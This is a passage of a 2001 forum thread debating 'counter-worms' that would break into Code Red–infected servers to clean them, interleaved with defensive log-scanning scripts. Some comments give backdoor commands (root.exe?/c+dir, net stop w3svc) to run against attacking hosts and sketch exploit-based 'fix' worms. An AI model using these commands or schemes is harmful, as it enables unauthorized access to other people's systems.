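    """One record per attacking client: hit count, first and last timestamp
    seen, and which filler letter(s) the probes used."""
    seen = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue            # malformed line: skip it rather than crash
        marker = probe_marker(rec['path'])
        if marker is None:
            continue            # ordinary request, not a probe
        entry = seen.setdefault(rec['ip'], {
            'count': 0,
            'first_seen': rec['time'],
            'last_seen': rec['time'],
            'markers': set(),
        })
        entry['count'] += 1
        entry['last_seen'] = rec['time']
        entry['markers'].add(marker)
    return seen


def group_by_network(seen, prefixlen=16):
    """Bucket attacking addresses by enclosing network so all hits from one
    provider's block can go to that provider in one report. Clients logged
    by hostname rather than address land in 'unresolved'."""
    groups = {}
    for ip in seen:
        try:
            net = str(ipaddress.ip_network(f'{ip}/{prefixlen}', strict=False))
        except ValueError:
            net = 'unresolved'
        groups.setdefault(net, []).append(ip)
    return groups


def format_report(seen):
    """Render the records as plain lines suitable for an abuse-desk e-mail."""
    lines = []
    for ip in sorted(seen):
        e = seen[ip]
        lines.append(f"{ip} hits={e['count']} first={e['first_seen']} "
                     f"last={e['last_seen']} form={''.join(sorted(e['markers']))}")
    return lines


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG.splitlines())
    for net, ips in sorted(group_by_network(hits).items()):
        print(f'{net}: {len(ips)} attacking host(s)')
    print('\n'.join(format_report(hits)))
```

To run it over a real log, replace SAMPLE_LOG.splitlines() with an open file handle; the scanner only reads the log and never contacts the attacking hosts, so the output is a list to hand to the providers' abuse desks rather than anything that acts on the remote machines.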
  225. Yes, but it's a horrible idea. by dave-fu · · Score: 1

    And for one simple reason: while it looks like the Code Red XXX variant, the fact of the matter is that you don't conclusively know that it is and even if you do, we're not dealing with a clinical lab dissection here. It's in the wild, it's already been backdoored, and someone else may have already loaded SubSeven or something of the sort on and been smart enough about it to cover their tracks, so you're left with your hands in the cookie jar and some explaining to do to some common sense-challenged lawyers.
    The Code Red worm is a known quantity. If people see files indicating they've been hit, hopefully they'll be smart enough to pull the plug and reformat/reinstall their system. Past that, there's not much you can do: pulling traces of the worm off the machine might actually be helping someone who came in between the time the machine got rooted and you fixed it as no traces of the worm means they can go back to their ignorant bliss.
    Leave it and report it to their ISP's help desk. It's unfortunately the best thing you can do.

    --
    Easy does it!
  226. Re:Its entirely possible by Anonymous Coward · · Score: 0

    Course the trick is to set up my apache server so that there is a default.ida which happens to be a cgi that will go out there and shutdown their box. In this case they came to me, not the other way around. Much as someone asks for a jpeg from my machine they get the jpeg. If they ask for their box to be shutdown they get it.

  227. Goatse.cx virus! by Anonymous Coward · · Score: 0, Offtopic

    I'll die happy after the day someone writes a goatse.cx virus and I see it on the front page of CNN.

  228. Re:Its entirely possible by Chris+Burke · · Score: 4, Funny

    It's like asking: If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee?

    That's a great analogy. Mostly because of the image it conjures.

    --

    The enemies of Democracy are
  229. Not the issue. by bool · · Score: 1

    The problem with these viruses/worms is that they cause DDoS attacks with all the scanning they do for vulnerable systems. To sufficiently write something that would act as a worm fix would require use of similar scanning methods thus furthering the DDoS potential of these worms.

    --

    ----------
    while (alive) { Work(); PayTaxes(); Eat(); Sleep(); }
    Bool
    1. Re:Not the issue. by RGRistroph · · Score: 1

      The fix virus doesn't have to scan, it just has to *listen* on port 80, because the infected machines will announce themselves by attacking. So the good virus can:

      1) listen on port 80 for the attack, or search local logs for the IPs of infected machines.

      2) Wait a reasonable amount of time, say 24 hours, so that responsible administrators of infected machines can fix their machines the way they want to.

      3) Use the root.exe backdoor to go in, close the hole, copy yourself there, and loop back to step 1)

      4) After you have been on a machine for a certain amount of time, say a month, delete yourself, leaving the machine uninfected and with the hole closed.

      How does that DDoS anyone ? It is conservative and unobtrusive enough that you wouldn't even know if it was already spreading through the internet now. The only way you could tell is by watching an infected machine to see if it got fixed.

  230. Yup, that's what I've been thinking. by Anonymous Coward · · Score: 0

    It's not a virus. It's simply a service for cleaning up systems that are bringing down the network. When a system sends a request with a series of XXXX's or NNNNN's, you continue the protocol by requesting that their system load a little program to correct the infection. If the machine chooses to comply, then fine. Otherwise, it can simply not do the request. It would be convenient if part of the program that cleans up the mess also installs this service. That way when other systems request the patch, it will be automatically downloaded and installed. Very convenient. It's not a virus -- it doesn't go hunting down systems. Systems come to it and request the patch!

  231. Re:Already been done by Anonymous Coward · · Score: 0

    You may not have to write it in assembly since you can bypass the VC++ runtime library and make API-only executables that are 3-4K in size that can do a lot.

  232. BugTraq by bemis · · Score: 1

    There was a very similar discussion on BugTraq during the first "outbreak" of CodeRed. The consensus pretty much was that while this would be technically possible, and (really) trivial, technically -- the question must arise "we can, should we?" -- and the ultimate answer appears to be a resounding "no".

    By loosing another worm onto the network, we would be adding to an already saturated network significantly more traffic -- *and* we'd be violating another's box/property -- ultimately making the writer of any "CodeRed-Fix_worm" no better than the original authors. (How many worm/virus/exploit writers do you know that have said "i wrote it to show that the vulnerability existed -- so someone would fix it"?)

    bemis
    -- Everyone in the world is doing something without me.

  233. Already been done by Xeger · · Score: 4, Interesting

    I thought of doing this a few days ago and I started coding. I got as far as a script to automatically reboot attacking machines, to help slow the spread of Code Red.

    I had begun work on a worm called Code Blue that would infect Code Red machines and clean them of Code Red. This kind of work is very laborious since it involves writing Intel assembly code that uses the Win32 API and runs in a Windows environment.

    Before I could finish, my best friend (who is a security consultant) informed me that somebody has already done this. There is a perl CGI script going around that you can put into your root directory and name "default.ida" so that infected machines will cause it to execute.

    The script connects to the IP of the attacking machine, uses the Code Red II backdoor to clean the system of trojanned files. Then it uses the very same buffer overflow exploit used by Code Red to send a binary to the server that patches IIS, removes Code Red-related registry entries and reboots the machine.

    1. Re:Already been done by startled · · Score: 4, Interesting

      2 things.
      1. Where's the script?
      2. Shouldn't it be modified to install itself? Otherwise, it'll get drastically outpaced.

      Note: yeah, yeah, ethics and so on. Disclaimer, and another one.

    2. Re:Already been done by gamorck · · Score: 0

      Give me a link to the URL! That would rock. I've been getting hit hard with this virus and my attempts to write the same util in Vbscript/ASP/C++ have been unsuccessful.

      Moderators: MOD THE PARENT UP!

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
    3. Re:Already been done by Bob+McCown · · Score: 1

      If true, where can we get this supposed amazing code?

    4. Re:Already been done by iabervon · · Score: 4, Insightful

      While you're at it, why not set up your server to document that it does that? E.g.

      Go <a href="default.ida">here</a> to check your server for the Code Red worm and remove it if found.

      Unlike an actual anti-security-hole virus, in this situation you are providing a legitimate and documented response to an actual request. If you're not scanning other machines unless they actually ask (either by following the link or by attacking you), it's not really any more unethical than, say, active FTP (if you send this message, I will open a connection back to you and send some data over it). It is no more using the other person's machine than, say, slashdot forcing my machine to render an HTML document or an FTP server forcing my machine to store the document I download.

    5. Re:Already been done by Phroggy · · Score: 1

      Would you mind sharing?

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  234. It's not a virus, it's a vaccine. by docstrange · · Score: 0

    OK, first I'd like to say that I had this idea, and submitted the same exact story to slashdot about a week and a half ago and it was rejected. It included the idea of a passive code red virus, that only fixed active hosts that probe a machine that I like to refer to as a "code red trap". If network admins worldwide were to put up anti code red stations based on a modified version of the code found on kuro5hin... (essentially a mouse trap for code red) it could run in the background, install the M$ patch then reboot the pc. (or popup a dialog requesting a reboot) my 2 cents.

    --
    Remember that you are unique, just like everybody else.
  235. Beneficial Worms by Restil · · Score: 2

    I have spent the last week thinking this over, and spent some time coding a test. Working with a known named hole, I ran a vulnerable version of named on a few of my machines.

    I obtained some script kiddy code to open up a shell on the alternate machine and started to modify it. Since I have no desire to be accused of starting a virus of any kind, I have no intention of finishing or releasing this, but I want to have the concept proven in case someone with more guts than I decided to release something similar.

    No matter how you look at it, I believe that releasing this worm would be illegal, at least in the US where I live. Knowing this, I'm not going to concern myself with legal issues, but with ethical ones. The purpose of this prototype worm is to exploit the named daemon and obtain a shell on the victim computer. Then it will send over a copy of the worm, along with a nonvulnerable version of named.

    On the victim's side, it will make a copy of all programs and configuration files it needs to change and replace them with safe versions. It will then send a message to root on that machine explaining exactly what was done and why, how to reverse the changes in case the worm broke something, and what to do in the future to avoid the same or similar problems. The worm will then find and exploit 256 more systems within the same network level, one in each subnetwork. For instance, if the worm is currently working at the class A level for the 24.0.0.0/8 network, it will try to find one system in the 24.1.0.0/16 network, one in the 24.2.0.0/16 network, etc. Each progression will work one level lower. This will prevent the same machine from being hit more than twice for every pass the virus makes over the internet. After finding 256 systems, the worm will shut itself down and remove itself.

    The important factor of this worm is the fact that it will ONLY be beneficial. If it causes more problems than it solves, it will be seen as another nuisance instead of fixing security holes as it is intended. It is important that root on the machine is notified of any changes. This gives the administrator the opportunity to fix other potential problems and if necessary reload the system. There must be a way that an administrator can leave configuration files on the machine so the worm will function in a limited capacity. The machine operator can therefore prevent the worm from making changes although they will still be notified if there's a security risk.

    The worm will only search for and detect a single flaw in a single program, and only use that specific program to exploit the system and only replace that single program. Updating an entire package to fix one program may actually introduce other security problems into the system. Programs deployed on the system should also be either compiled on that system or statically linked to prevent any library conflicts.

    On a side note, the worm might also want to check for a root kit on the machine and notify root if one exists. If the machine has already been compromised (which is possible if there are vulnerable programs running), then the machine will need to be reloaded and root needs to know about it. Fixing one program won't make any difference.

    Am I completely off my rocker here? Comments?

    -Restil

    --
    Play with my webcams and lights here
  236. Unethical by jack.d.ripper · · Score: 1

    I'm sure it's possible, but it's still not ethical to go in and change people's systems without their knowledge or consent, even if you're "helping" them.

    1. Re:Unethical by Anonymous Coward · · Score: 0


      On the day it came out and I heard about it here, I tried it out for curiosity's sake.. I looked up some IPs from my logs..and all I did was root.exe?/C+dir ... I did this maybe to two computers (although multiple times, the first times it didn't work correctly because of the stupid hex % thing), and finally to the second one I did a root.exe?/C+ren+root.exe+codered_fix or something like that.......... the next day my Netzero ISP account was cancelled... I don't know for sure this was the cause, but I think it must have been (why else would your username disappear from the database mysteriously)

      I think the best thing is : Do NOTHING!!

    2. Re:Unethical by kabhul · · Score: 1

      Why's everybody so concerned with ethicality and legality all of a sudden? What about efficacy? I'd think as long as the cure works and makes CodeRed go away, it is a good thing.

      I'm surprised nobody has tried to write a kind of counter-worm as of yet.

  237. Attack the attacker - Apache plug-in? by Anonymous Coward · · Score: 0

    Why hop around the entire 'net? This will only waste more bandwidth.

    Instead, why not set up something that will detect an attack (check those web logs) and send the "fix" to that attacker? I think it's ridiculous that MS has created such a pile of garbage (ridiculous, not surprising) and helping them isn't something I necessarily favor, but: 1) I'm tired of dealing with unwanted network traffic and 2) the 'net overall has started to bog down because of this crap.

    As far as legal issues, well, how legal is it for someone to have a compromised machine that's attacking your system? The "fix" shouldn't do anything terrible....maybe create a folder on the desktop that says "UPDATE YOUR OS NOW!!" and then disable the machine (nicely).

    If someone made a reasonable fix, I'd use it. Just make it, set it up so it doesn't destroy the attacking system, don't let it destroy the host system ;-), and make it available so that anyone who has the balls (or is stupid; same thing I suppose) to use it can do so. The hell with them, I'll deal with the legal issues....just get these compromised Microjunk web servers off the 'net already.

  238. I don't agree, but if we're on the subject... by Alan · · Score: 1

    Why just infect the infected machine and close the backdoor? Have the virus actually carry the Microsoft fix and install it right there and then.

    Wow, aren't MS products great that allow you to use so much power through a mail client?!

    *sigh*...

  239. Re:Its entirely possible by famillionaire · · Score: 1, Interesting

    I'm going to insult the next person who mods me up too, and hopefully we'll start a cool new Slashdot trend.

  240. you can't be sure... by Heywood+Yabuzof · · Score: 1

    I personally can't construct a situation like this, but let's say that the microsoft patch (or whatever patch your virus applies) causes that person's version of IIS to crash? Maybe they've got some crazy-ass custom app that uses those index server extensions for something and patching it breaks their custom app and that's why they haven't patched their IIS server? Then you really would be liable for lost business, etc.

    Of course, this seems highly unlikely. OTOH, strange things can happen with NT/IIS (asp-to-mail is my personal fave). Let's just use this as a purely hypothetical example. There might be a case where someone has a good reason not to patch their system. That doesn't excuse them from pursuing alternate methods of blocking or preventing this kind of thing, but you really can't assume that 100% of unpatched servers are unpatched due to stupidity or laziness (five nines, maybe :-)).

  241. Re:Its entirely possible by Grishnakh · · Score: 1

    But wouldn't this be harder to prosecute? After all, if you leave the burglar alive, it's your word against his. If you kill him, it's your word against a dead man's. You can say anything you want about how he threatened you, appeared to brandish a weapon, etc. Heck, you could quickly get an illegal handgun and stick it in his hand to seal the case shut.

  242. this is off topic and will kill my Karma, oh well by 20000hitpoints · · Score: 1

    Interesting, interesting. Let's talk (off topic) about right and wrong...

    Right and wrong... these are concepts, right? Ideas. But does a sea turtle know the difference between right and wrong? No. And what guides the actions of a sea turtle? Just drives, hunger, sex, etc. How are we different? Why do we bother to talk about concepts like right and wrong? Are we only driven by hunger, thirst? No... we are driven by ideas. You serve an idea. It drives you, determines what you do in the same way hunger drives a sea turtle.

    Ideas are programs, sets of instructions, and you are the computer that follows them. So who are the programmers?

    Philosophers and religious leaders. The ones who come up with the ideas.

    --
    Don't post on slashdot. Get back to work.
  243. Comparison with Genetic Engineering by delibes · · Score: 1

    I recall a number of stories (quick Google search returned this Guardian link) about modifying viruses IRL to cure real diseases. What you're talking about is a digital equivalent. Of course the real world viruses don't spread from body to body through the air (far too dangerous), so to maintain the analogy, you have to choose which digital doctor you'll allow to inject you with a computer virus. Can you imagine a Mad Doc McGates? *shudder* Hold on, this is just like downloading a virus update file... oh well.

    --
    This is not a sig
  244. Re:Its entirely possible by starseeker · · Score: 1

    Law or no law, I think you'd have a hard time finding a jury who wouldn't sympathise with the home owner, especially if they have small children. If someone willfully breaks into your home, they're asking for it. They have no right to be there.

    --
    "I object to doing things that computers can do." -- Olin Shivers, lispers.org
  245. Re:Darwinian Predator - Prey relationship on the n by famillionaire · · Score: 1

    I'm no moderator, but take heed, for the above is very funny.

  246. What About a Passive Worm? by Snowdog · · Score: 1

    A better (and possibly less illegal) approach would be to implement a "passive worm" that sits on your server and monitors the httpd logs, and only goes out and disinfects and patches servers that attempt to break into your system. In this case (it could be argued) the administrator of the server running the passive worm is only trying to defend his machine from attack.

    Clearly some sort of automated solution is needed. Since IIS is installed by default on many systems as part of another software installation there are too many people out there with vulnerable systems who have no idea how to patch them.

  247. can we swap Katz for a lawyer? by Anonymous Coward · · Score: 0

    *wishing*

  248. Why not put up a webpage that people can use? by Keeper · · Score: 5, Insightful

    Just put up a website on your computer that advertises the ability to automatically clean the CodeRedII virus off of the viewer's system, if present.

    All the viewer has to do is click a button at the bottom of the screen.

    Just so happens that this particular button sends a request to /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (etc), which then scans the sender's IP and proceeds to start a command session, download the patches, and do whatever else needs to be done to vanquish the worm.

    After all, they did click on the link, right? :)

    Seriously though, if someone wants to get all pissy about you going to their box and fixing their screwup, threatening to sue and the like, I'd just countersue ... after all, they tried to hack your box first. ;)

    1. Re:Why not put up a webpage that people can use? by crisco · · Score: 1
      Ok, then both of you would be liable under the laws prohibiting 'unauthorized computer access'. And how would a judge decide, when faced with an act of negligence on one hand (dimwit didn't patch their MS box) and intentional action on the other hand (knowingly access a compromised box without authorization from the owner)?

      But, yeah, what if a web page on your box was named default.ida and responded to a GET request with a response that caused some action on their machine.

      After all, they initiated the transaction, right? Same as browsing a web page, that causes an action on their box that originated on your web server.

      An above poster compares this to having medical treatment forced upon you. Using this analogy, this 'disease' forces specific behavior upon the host, in effect forcing the host to go around asking for something. Can it be unethical to give the host something it was asking for? :P

      Actually, it would be, the only ethical thing to do is to try to bring the problem to the attention of the owner of the machine. Obviously this means enlisting the help of the ISP, as many of these machines are on dynamic IPs.

      --

      Bleh!

    2. Re:Why not put up a webpage that people can use? by ahrenritter · · Score: 1

      Actually, combining this with the comments here and here could make a very effective and apparently legal counter to the Code Red II problem.
      If you posted a page on your website stating that people could access the link .../default.ida to automatically download code to clean their machine of code red and install the cleaner in its place, then put similar text into the default.ida script, that would give you a semblance of "requesting permission".
      You don't cause additional problems because you only communicate with infected machines to boot!
      What do you think?

      --

      All I wanted was a rock to wind a piece of string around, and I ended up with the biggest ball of twine in Minnesota
    3. Re:Why not put up a webpage that people can use? by Keeper · · Score: 2

      Why wouldn't it be criminal? It'd certainly be more criminal than fixing their box -- I didn't have to do anything to gain access to their box; they were actively attempting to gain access to my box.

      They could argue "oh, it was code red" and I could argue "yeah, you had it, but you were actually doing things independently too".

      And they did click on the link of their own free will. ;)

  249. This is not the problem... by Anonymous Coward · · Score: 0

    The way I see it, we would have just as big of a problem with the "cure" worm. How would we stop the "cure" worm, send out another one? And so on. It would suck up almost as much bandwidth as code red.

  250. Indexing server is essentially part of IIS by brlewis · · Score: 2, Insightful

    The indexing server is bundled with IIS, and is one of the main reasons for choosing IIS -- searching is bundled right in. Comparing it with "some CGI script" is disingenuous.

    It would be fair to compare it with Apache modules that are part of the standard distribution and are usually installed. Care to point out a recent hole in such a module?

    Insightful, my foot. The pro-MSFT moderators are busy today.

    1. Re:Indexing server is essentially part of IIS by SuiteSisterMary · · Score: 2

      There is an incredible difference between there being an exploit, and there being an exploitable bug. Can I name a recent hole? No. Does that mean anything at all? No. I'll also point out, as I have been for weeks, that the patch was available for a month before code red 1, leading me to believe that the patch spawned the exploit. Can't blame MS for people not installing patches like they should.

      --
      Vintage computer games and RPG books available. Email me if you're interested.
  251. I've done some of this by RobertGraham · · Score: 4, Interesting
    I created a program that automatically checked for the backdoor upon receipt of a /default.ida attack (/scripts/root.exe?). It didn't work: the CodeRedII worm is DoSing itself - after enough reinfections, the server stops being able to respond with requests.

    As a more casual defense, I've written stuff that causes the worm to hang in its receive function: http://robertgraham.com/tools/deredoc. It's kind of fun, I've got hundreds of worm threads waiting for me to respond back to them.

    You can create benign anti-worms. You can setup a worm to only counterattack when attacked itself. Such a worm would not bother innocents, and would only spread to infected systems, cleaning as it went. In other words, it wouldn't be 'scanning' -- it only responds upstream to infected systems. There are two problems to that approach: the first is that CodeRedII DoSes itself, so the systems cannot be exploited, either with the .ida attack or the backdoor. The second problem is that a heck of a lot of these systems are behind firewalls, and you cannot directly contact them on port 80 (CodeRedII has been extremely effective about worming its way around firewalls).

    You can evade legal constraints. Post the source of your anti-worm to Usenet as an example how an anti-worm is constructed. This is legal free-speech -- as long as you don't encourage others to run it.

    CodeRedII is raging inside corporations. It would be extremely ethical to put something on your own machine to help stop it. One example would be a script (CGI, PERL, PHP, ASP) named /default.ida on your system that did something like "/scripts/root.exe?/c+net+stop+w3svc" back at the attacker.

    1. Re:I've done some of this by Anonymous Coward · · Score: 0

      -1, Advertisement

      At least you're only advertising yourself this time instead of your company, but it would be nice if - just once - you could post without trying to direct people to your website.
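    Several comments above (237, 246 and 251) describe the same first step: watch your own web server logs for the Code Red probe and for follow-up use of the root.exe backdoor, and collect the source addresses. The script below is an added example, not code written by any of the commenters or by Microsoft; it parses Apache-style combined log lines, classifies the two request shapes discussed in the thread, and tallies them per source IP so the list can be handed to the owner or ISP. The log lines are constructed samples, and the assumption that the original Code Red pads its request with "N" while Code Red II pads with "X" follows the published worm write-ups as I remember them; treat that mapping as an assumption rather than something the thread establishes.

```python
"""Flag Code Red / Code Red II artefacts in an access log.

Added example, not from the thread. Recognises two request shapes:
  1. the .ida overflow probe   GET /default.ida?NNNN... (Code Red, assumed)
                               GET /default.ida?XXXX... (Code Red II, assumed)
  2. use of the backdoor       GET /scripts/root.exe?/c+...
and aggregates hits per source IP for notification, not counterattack.
"""
import re
from collections import Counter

# Apache "combined"/"common" prefix: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
# The worm's request: /default.ida? followed by a long run of filler bytes.
IDA_PROBE_RE = re.compile(r'^/default\.ida\?(?P<filler>N{20,}|X{20,})')
# Code Red II's backdoor: root.exe (a copy of cmd.exe) with /c+<command>.
BACKDOOR_RE = re.compile(r'^/scripts/root\.exe\?/c\+', re.IGNORECASE)

# Constructed sample log; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2001:10:12:01 -0400] "GET /index.html HTTP/1.1" 200 512
192.0.2.17 - - [04/Aug/2001:10:12:03 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 320
198.51.100.9 - - [04/Aug/2001:10:13:44 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858 HTTP/1.0" 404 320
198.51.100.9 - - [04/Aug/2001:10:14:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
203.0.113.2 - - [04/Aug/2001:10:15:00 -0400] "GET /default.ida HTTP/1.0" 404 210
192.0.2.17 - - [04/Aug/2001:10:16:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 320
"""


def classify(path):
    """Label a request path, or return None if it is not a worm artefact."""
    m = IDA_PROBE_RE.match(path)
    if m:
        # Filler character distinguishes the variants (assumed mapping, see lead-in).
        return "codered1-ida-probe" if m.group("filler").startswith("N") else "codered2-ida-probe"
    if BACKDOOR_RE.match(path):
        return "root.exe-backdoor-use"
    return None


def parse_line(line):
    """Split one log line into fields; None for lines that do not fit the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Yield (ip, label, timestamp) for every worm-related request in the log."""
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec["path"])
        if label:
            yield rec["ip"], label, rec["ts"]


def attacker_report(text):
    """Count worm-related requests per (source IP, label); this is the notification list."""
    counts = Counter()
    for ip, label, _ in scan_log(text):
        counts[(ip, label)] += 1
    return dict(counts)


if __name__ == "__main__":
    for (ip, label), n in sorted(attacker_report(SAMPLE_LOG).items()):
        print(f"{ip:16} {label:24} {n}")
```

    Two details worth keeping when adapting this: the bare `GET /default.ida` with no query (a curious browser, or a scanner) is deliberately not flagged, and a host that shows up with a root.exe request but no .ida probe is still a Code Red II victim, since the backdoor only exists on an already-infected box. Feed the resulting IP list to `whois`/the ISP's abuse contact rather than back at the host; the comments above spell out why.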

  252. Re:I Hope You Keep Bail Money Near Your Gun by Anonymous Coward · · Score: 0
    Is human life worth less than property?

    I agree.

    If you shoot a burglar there are two crimes: a burglary and a homicide. In my book homicide is far more serious.

    Killing criminals should be left only for the law-enforcement people. Otherwise we'll end up with a vigilante society.

  253. DOS against security focus... by Lando · · Score: 2

    Ehmmm,
    For those of you participating in the DOS attack against Securityfocus...

    Although they did not launch a posting to this, in the mailing list they said that they were going to discontinue taking mailings from people.

    When I went to get the link for this message I found that they are having a hard time responding to HTTP requests... Perhaps caused by the slashdot community?

    Lando

    --
    /* TODO: Spawn child process, interest child in technology, have child write a new sig */
  254. Re:Its entirely possible by mother_superius · · Score: 1

    IANAL.

  255. Re:I Hope You Keep Bail Money Near Your Gun by Peter+Dyck · · Score: 1
    Maybe in places like the UK they don't mind that robberies while the owner is home have gone up since the draconian gun laws. I do.

    Is human life worth less than property?

    You sure seem to think so.

    To me taking a human life is acceptable only purely as self-defence in a life-threatening situation. "Protecting your property" is not enough. You can always buy more stuff, you can get an insurance. Hell! You can set up alarms all over your property if you're so worried about it.

    Human life, on the other hand, can never be restored.

  256. just pop up an explorer window for cert.com by Gkeeper80 · · Score: 2, Informative

    This isn't original, a friend found it posted somewhere, but you can call up an Internet Explorer window with the CERT advisory (or the patch for that matter) by using the root.exe file. Like such: http://the.fckd.up.host/scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html This works great for cable/DSL users who might not even know they have a webserver running. Kinda tough to ignore Explorer windows popping up, even on a MS computer.

  257. Better idea... by Anonymous Coward · · Score: 0

    Don't allow any connections inbound to the network that weren't initiated from the inside. Businesses have been doing this for years with stateful packet filtering or proxy firewalls. There's really no reason to let users run web servers on the net.. cable modem and DSL users are just too large a risk to allow unfettered server access. Now, if you sign a contract and agree to do a risk assessment of your server and keep up with patches (at risk of legal penalties) then fine.. you can run your web servers.

  258. Re:Its entirely possible by Rinikusu · · Score: 1

    /* If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee? */

    If the bastard is in *your* house, it really doesn't matter *why* he's there. You don't know for sure why he's there, all you know is he broke in your house. That's why if someone breaks into your house and you blast him, it's generally held as self-defence.

    With computers, it's completely different. With a case like Code Red, after examining the virus itself, you can determine the damage it causes *after* the fact. However, sometimes that's "too late" and loss of property is accomplished (I don't care what the "anti-intellectual rights" people say. If I write a document, that document is mine, whether on floppy, printed out on a sheet of paper, or scribbled on a napkin.) The argument would be: If someone is actively probing my house for weaknesses, is that person considered a hostile threat? In my neighborhood, yes they are. You bang on my windows and doors trying to test the locks and 5-0 will be on your ass faster than you can say "But, I was just testing to see if the doors were unlocked..." Intent is the key and unless you *live* in my house or I give you explicit permission to test my house, I, and the police, will assume your intent is hostile. Let your lawyers fight it, I don't care.

    Unfortunately, this is not my house. If anything, the internet might be considered some kind of "private commons." It'll probably be illegal as hell for someone to write an anti-codered virus, but hell. Seeing how thousands of sysadmins, after extensive media coverage, STILL haven't closed the holes, they're wasting *my* bandwidth, *just* like spammers, eh?

    I say someone needs to write the anti-code red inoculation, and then someone else needs to write an anti-Outlook virus (one that turns off all those nasty features that make it so dangerous to mail servers around the world).

    Knowing our current justice system, however, the writer of "anti-code red" would be tracked down and hauled to court (and then jail) while the real perpetrators would continue to crank out virii after virii...

    Just an observation: I've noticed that a lot of the so-called "Chinese virii" (Code red, "fuck USA government, etc) all seem to have major flaws in their design, implementation, etc. Does anyone else get the idea that someone, somewhere, is getting an education from all this? I mean "Yes, the virus worked, but.. Ahh.. crap, forgot about that... I'll fix that next time.." It's almost as if these are HS/College course projects...

    --
    If you were me, you'd be good lookin'. - six string samurai
  259. Go ahead and try... (I really dont recommend this) by Anonymous Coward · · Score: 0

    Just remember to say "Hi!" to Max Vision when you are in the slammer....

  260. Re:Its entirely possible by Anarchos · · Score: 1

    No, it's shooting a gun at people who are firing their guns at random: it's just a matter of time until they hit someone else.

    --

    "A good conspiracy is an unprovable one." -Conspiracy Theory
  261. Already Happened, I Think by Prof_Dagoski · · Score: 2

    I remember seeing a /. blurb about just such a thing. If I remember right, after it invaded the system, it patched a security hole, copied itself onto whatever removable media was in the computer and deleted itself. Unfortunately I couldn't find the article in the archives.

    In the meantime, this sort of program is pretty trivial, aside from invading a secured host. I've heard talk in various organizations about writing maintenance viruses to crawl the network's hosts and do whatever updating needed to be done. Such ideas are usually tanked because everyone's a little nervous about independent critters running loose, doing things on their computers. Besides, there are more reliable automated ways to install patches and updates. In the meantime, writing one of these as a good samaritan deed would likely get you prosecuted because, 1) You don't own the computers you're infecting 2)You don't know what the configuration is on the machines and your virus might screw 'em up, 3)What if you missed a bug in your code?

  262. ...but it's a bad idea by Sun+Tzu · · Score: 3, Insightful

    After all, how do you tell a 'good' virus from a bad one? It might be harder than you realize, if you're a virus scanner, for example. There is an article here that deals with some of the other issues that 'good' viruses raise.

    1. Re:...but it's a bad idea by the_2nd_coming · · Score: 1

      No worries, as long as it is a worm that exploits a security hole, it will just pass on by the virus scan.

      --



      I am the Alpha and the Omega-3
  263. OT:Why fight the effect instead of the cause? by the_crowbar · · Score: 1

    I find it very interesting to watch these worms/viri spread. If we could get companies to fix the design flaws in their software then these scenarios would occur much less frequently.

    --
    Have you read the Moderator Guidelines
  264. Re:There is another way... by Ranger+Rick · · Score: 1

    I did the same thing, and so far the only e-mail I've gotten is from one person who asked me to "send the e-mail to the proper abuse address". Freakin' idiot. If you'd admin'd your machine properly in the first place, you wouldn't have been getting e-mails from me!

    Oh well, hopefully someone who's gotten an e-mail has done something about it. Not holding my breath though. =)

    --

    WWJD? JWRTFM!!!

  265. love Sircam and looking for .aq by pjones · · Score: 1
    I've received Sircam documents from every continent except Antarctica. Just yesterday I got them not only from .mx .ca .edu .de .fr .ru and .kr but also from .ga (can you guess that one?) and .cl. I usually get a .in about once a week minimum since the virus started. I have so many new friends!

    But when will I get a .aq?

    --
    Certified Black Helicopter Pilot *** Unwitting Dupe of One World Gov'ment
  266. Not just that by einhverfr · · Score: 2
    Worms are not to be messed with that way. The first worm was released as a self-replicating software update (by Intel iirc). However, partway through their network, the payload became truncated, though it continued to replicate. The result was that the worm took down a good portion of their network.

    With the internet, this is a greater danger because the number of machines is much larger...

    --

    LedgerSMB: Open source Accounting/ERP
  267. Virii ? me tooo ! by GeView · · Score: 1

    Hey guys, can you do me a favor? Please mail me the latest virii you have, or also older ones, you got by mail.
    I'm really interested in them.
    Please mail them to prax2000@gmx.net
    Thanks. Also if you know a virii database, it would be pretty cool if you could tell me about it.
    Thanks.

  268. Fighting fire with fire is not always the solution by _bug_ · · Score: 1

    There have been a lot of discussions on this topic over the past couple of years on several security mailing lists that I either belong to or frequently browse the archives of. While it is certainly possible to do so and it would solve some headaches and the irony of it all would make for a great story, it's just not something that should be done. System administrators need to learn that they must actively protect their system by keeping up to date on patches as well as taking other steps (IDS, firewall, log monitors, etc.) to keep their systems secure. By creating a counter-worm system administrators are not being taught the hard lessons learned when their system is attacked and infected. Administrators either start to rely on counter-worms or they simply never become aware that their system was compromised because the counter-worm has already patched things up. Counter-worms do not promote good administrator habits and are only helping to promote the PROBLEM (lazy/unaware sysadmins) rather than the SOLUTION (education and motivation to keep a system protected).

